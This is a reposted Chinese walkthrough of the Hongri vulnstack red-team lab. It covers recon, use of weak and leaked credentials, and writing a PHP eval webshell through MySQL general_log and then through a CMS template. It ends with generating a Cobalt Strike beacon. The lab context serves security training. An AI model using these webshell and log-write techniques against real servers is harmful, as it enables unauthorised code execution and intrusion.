ATT&CK 实战 - 红日安全 vulnstack (一)


0x01 关于红日靶场的下载和介绍

百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密码: 【红日安全】您的下载密码为:n1u2。

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:

网络配置如图所示

打开虚拟网络编辑器
image

设置VMnet1子网IP
image

添加Vmnet2子网IP
image

网络拓扑图
image

实际配置的截图为
image


0x02 渗透服务器

信息收集

打开win7 x64的 phpstudy

image

发现主机

netdiscover -i eth0 -r 192.168.52.0/24

image

使用攻击机kali自带的 nmap 进行端口扫描

nmap -sS -A -n -T4 -p- 192.168.52.143

image
可知道已经开启勒 80 和其他端口

访问 80 端口

image
phpstudy的探针界面,我们使用 root/root 开始连接一下数据库
image
image
正上脚提示已经连接数据库成功

使用御剑开始进行扫描

image

得到 /phpmyadmin ,我们先放着我们的扫描得到的端口

使用 Dirmap 对于网站扫描以便得到网站的目录文件

dirmap.py -i http://192.168.52.143/ -lcf

image
下载源码文件 beifen.rar ,审查文件
使用VScode的搜索功能在PHP源文件(beifen\yxcms\data\db_back\1384692844.sql.php)找到密码
image
得到后台登陆的账号密码:admin:123456 和登录路径 /index.php?r=admin

0x03 开始 拿shell

登入 /phpmyadmin
弱密码 root/root

使用SQL语句查看是否有无权限

show variables like '%secure_file%';

image
secure_file_priv 值为 NULL 不能使用into 方法导入shell

我们尝试在日记写 shell ,使用SQL语句开启日志服务

set global general_log = "ON";

image

查看当前日志: show variables like 'general%';:
image

指定日志文件: set global general_log_file = "C:/phpStudy/www/1.php";:
image

开始写入一句话木马
SELECT '<?php eval($_POST["cmd"]);?>'
image

记录一下出错是怎么回事儿,自己运行的 phpstudy 是在桌面上(Desktop)的 ,直接桌面上的导致路径出错,桌面上的打开的 phpstudy 的文件是在 C:\WWWW
实际上输入一句话放在地方是 C:\phpStudy\WWW
因为自己电脑装了两个 phpstudy 所以导致路径的问题,解决方法是:直接进入 C:\phpStudy 打开 PHPSTUDY.EXE

这样我们就成功拿到 shell
image

0x04 另一种方式获取到SHELL

我们打开 192.168.52.143/yxcms
查看一下是否存在 目录遍历漏洞
image
我们使用之前得到的地址访问 /index.php?r=admin 进入后台
密码之前已经得到了:admin/123456
image
在前台模板的模块写入一句话木马
image
使用蚁剑连接到 shell

0x05 内网以及与域渗透

使用 CS 创建 Listenpayload 选择 beacon http
image
image
然后选择 攻击 -> 生成后门 -> Windows Executable(S) 选择刚创建的 Listenner
image
image
由于我们之前关闭勒防火墙,所以我们直接点击生成的 exe 文件就可以获得CS的shell
image


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM